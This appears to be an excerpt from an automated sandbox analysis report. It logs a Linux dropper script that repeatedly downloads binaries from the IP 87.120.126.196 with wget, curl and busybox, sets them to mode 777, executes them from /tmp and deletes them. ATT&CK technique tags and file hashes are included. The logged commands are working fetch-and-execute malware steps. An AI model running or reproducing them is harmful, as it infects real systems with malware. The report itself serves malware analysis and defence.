/usr/bin/curlcurl -O http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:895
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:901
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:907
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:913
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:919
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:927
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:929
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97